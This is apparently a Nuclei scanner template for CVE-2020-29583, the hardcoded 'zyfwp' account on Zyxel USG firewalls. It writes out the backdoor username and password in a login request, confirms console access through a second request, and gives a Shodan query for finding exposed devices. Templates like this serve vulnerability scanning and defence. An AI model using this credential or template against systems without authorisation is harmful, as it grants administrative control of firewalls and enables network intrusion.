id: CVE-2020-29583

info:
  name: ZyXel USG - Hardcoded Credentials
  author: canberbamber
  severity: critical
  description: |
    A hardcoded credential vulnerability was identified in the 'zyfwp' user account in some Zyxel firewalls and AP controllers. The account was designed to deliver automatic firmware updates to connected access points through FTP.
  reference:
    - https://www.zyxel.com/support/CVE-2020-29583.shtml
    - https://support.zyxel.eu/hc/en-us/articles/360018524720-Zyxel-security-advisory-for-hardcoded-credential-vulnerability-CVE-2020-29583
    - https://nvd.nist.gov/vuln/detail/CVE-2020-29583
    - https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-29583
    cwe-id: CWE-522
  metadata:
    max-request: 2
    verified: true
    shodan-query: title:"USG FLEX 100"
  tags: cve,cve2020,ftp-backdoor,zyxel,bypass,kev

http:
  - raw:
      - |
        GET /?username=zyfwp&password=PrOw!aN_fXp HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /ext-js/index.html HTTP/1.1
        Host: {{Hostname}}

    cookie-reuse: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_2
        words:
          - 'data-qtip="Web Console'
          - 'CLI'
          - 'Configuration">'
        condition: and

      - type: status
        status:
          - 200